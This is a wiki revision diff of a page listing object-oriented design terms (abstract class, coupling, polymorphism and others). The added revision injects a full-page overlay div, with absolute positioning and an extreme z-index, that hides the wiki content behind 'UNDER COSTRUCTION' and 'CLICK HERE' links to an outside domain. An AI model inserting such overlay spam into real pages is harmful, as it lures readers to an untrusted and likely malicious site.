Nomenclature
From CSSEMediaWiki
(Difference between revisions)
Line 1: | Line 1: | ||
− | The naming conventions used in the field of OOD. | + | >The naming conventions used in the field of OOD. |
* [[Abstract class]] | * [[Abstract class]] | ||
Line 24: | Line 24: | ||
[[Category: Nomenclature]] | [[Category: Nomenclature]] | ||
+ | |||
+ | ---- | ||
+ | <div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;"> | ||
+ | ---- | ||
+ | =[http://okowimaxyj.co.cc UNDER COSTRUCTION, PLEASE SEE THIS POST IN RESERVE COPY]= | ||
+ | ---- | ||
+ | =[http://okowimaxyj.co.cc CLICK HERE]= | ||
+ | ---- | ||
+ | </div> |
Revision as of 02:32, 18 November 2010
>The naming conventions used in the field of OOD.
- Abstract class
- Abstraction
- Aggregation versus Composition
- Association versus Dependency
- Class versus Object
- Component versus Module
- Coupling
- Encapsulation (or Information hiding)
- Inheritance
- Instance
- Interface
- Method
- Multiple Inheritance
- Overloading
- Package versus Namespace
- Polymorphism
- Properties / Fields / Attributes
- Superclass
- Subclass
Nomenclature | |
---|---|
Techniques: Abstraction | Aggregation versus Composition | Association versus Dependency | Coupling | Encapsulation | Information hiding | Inheritance | Multiple Inheritance | Overloading | Polymorphism
Features: Abstract class | Class versus Object | Component versus Module | Instance | Interface | Method | Package versus Namespace | Superclass | Subclass |